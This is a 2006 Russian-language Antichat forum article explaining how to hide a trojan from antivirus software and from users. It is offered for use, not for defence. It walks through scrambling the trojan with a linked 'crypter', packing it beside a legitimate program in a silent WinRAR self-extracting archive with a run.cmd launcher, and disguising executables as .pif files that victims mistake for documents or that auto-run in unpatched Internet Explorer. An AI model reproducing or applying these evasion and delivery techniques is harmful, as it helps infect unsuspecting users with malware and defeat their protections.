ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Прячем трояны от антивирусов, пользователей, собак и кошек =)
  #1  
Старый 03.11.2006, 21:23
Аватар для ReanimatoR
ReanimatoR
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
Провел на форуме:
2154209

Репутация: 341
Отправить сообщение для ReanimatoR с помощью ICQ
Smile Прячем трояны от антивирусов, пользователей, собак и кошек =)

И так у нас есть трой...НО он палится антивирями. Что делать? Идти покупать криптор - нет это не для нас... Писать свой трой или криптор - не все умеют, а иногда лень...
Теперь мы сделаем это подручными средствами за минуту...
Нужно: winRAR и программа crypter, написанная Talisman'ом специально для этого дела...
1. Подготавливаем внутренность архива.
Внутренности архива:

Ваши файлы + 3 следующих файла:
1. run.cmd
2. 1.exe
3. crypter.exe, найдете в конце статьи
----
1.exe - и есть ваш троянчек.
В run.cmd пишем следующее:
Код:
start yourprogramm.exe
start crypter.exe
start 1.exe
exit
, где yourprogramm.exe - ваша нормальная программа.
Что это делает?
при запуске run.cmd у нас запускается crypter.exe и все=)
Теперь рассмотрим crypter.exe:
Это всего навсего программа, которая меняет порядок байт в файле(то есть делает кашу). При первом запуске она меняет порядок файлов, при втором возвращает все на место.
-----
И так для первого шага кладем ваш exe'шный файл в какую-то папку, туда же кладем своего трояна с именем 1.exe, туда же кладем run.cmd с кодом выше^^ и туда же кладем cryptor.exe.
Теперь запускаем crypter.exe и у нас файл перепутался и антивирус теперь не палит его...

2. Делаем sfx архив:

Выделяем наши файлы и жмем добавить в архив.

Отмечаем пункт 'Создать SFX-архив'.

Переходим на вкладку дополнительно и жмем 'Параметры SFX'.

Переходим на вкладку Режимы и отмечаем пункт Скрыть все и Перезаписывать все файлы (теперь при запуске архива не будет выводиться никаких окон).


Переходим на вкладку Общие. Нас будет интересовать путь для распаковки. Можно здесь прописать путь к папке в которую будут извлекаться файлы. Все файлы будут извлекаться в одну папку. Можете написать "%windir%".


Иконку для результирующего исполняемого файла можно выбрать на вкладке Текст и Иконки , нажав на кнопку Обзор.

На вкладке Общие в поле выполнить после распаковки пишем run.cmd
---------
Дополнение:
Переименуем любой exe файл в pif.
О-ба! все работает так же=) но во-первых pif'a в винде не видно и во-вторых очень часто путают с документами Acrobat Reade'a
---------
Pif с непропатченным браузером IE запускается при клике на ссылку, не нужно нажимать сохранить и так далее...
---------
Статья сделана на основе http://forum.antichat.ru/thread24979.html
Она будет постепенно обновляться, так как у меня есть еще очень много полезных идей, чтоб замаскировать троян от антивирусов.
============================
Crypter.exe:
Работает только с файлом с именем 1.exe
http://slil.ru/23344495
Написал Talisman

============================
Просьба писать о всех недочетах и ошибках, найденных в статье

Последний раз редактировалось ReanimatoR; 30.01.2007 в 18:47..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ca страхует пользователей антивирусов на $1500 от заражения вирусами KPOT_f!nd Мировые новости 0 29.09.2006 05:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ